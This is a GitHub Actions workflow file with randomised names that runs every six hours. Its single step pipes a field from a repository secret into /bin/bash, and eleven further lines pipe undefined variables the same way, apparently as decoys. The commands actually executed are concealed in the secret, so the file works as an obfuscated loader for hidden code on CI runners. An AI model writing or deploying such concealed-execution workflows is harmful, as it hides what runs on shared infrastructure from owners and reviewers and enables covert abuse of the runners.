name: zheyangdezk
on:
  workflow_dispatch:
  schedule:
    - cron: '5 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: zheyangdezk
        env:
          olhb87389: ${{ secrets.olhb87389 }}
        run: |
          echo $olhb87389 | jq -r .gyh917 | /bin/bash
          echo $eozie374 | jq -r .cvov98605 | /bin/bash
          echo $hvryn645 | jq -r .cfmzx619 | /bin/bash
          echo $wcob48 | jq -r .xt193 | /bin/bash
          echo $fq5 | jq -r .h03827 | /bin/bash
          echo $x68 | jq -r .d4540 | /bin/bash
          echo $y12885 | jq -r .i6871 | /bin/bash
          echo $cjwe53 | jq -r .yl5490 | /bin/bash
          echo $gaux8892 | jq -r .hly0681 | /bin/bash
          echo $uzis576 | jq -r .l06 | /bin/bash
          echo $gv2 | jq -r .bdt27 | /bin/bash
          echo $x684 | jq -r .hfnsx60 | /bin/bash

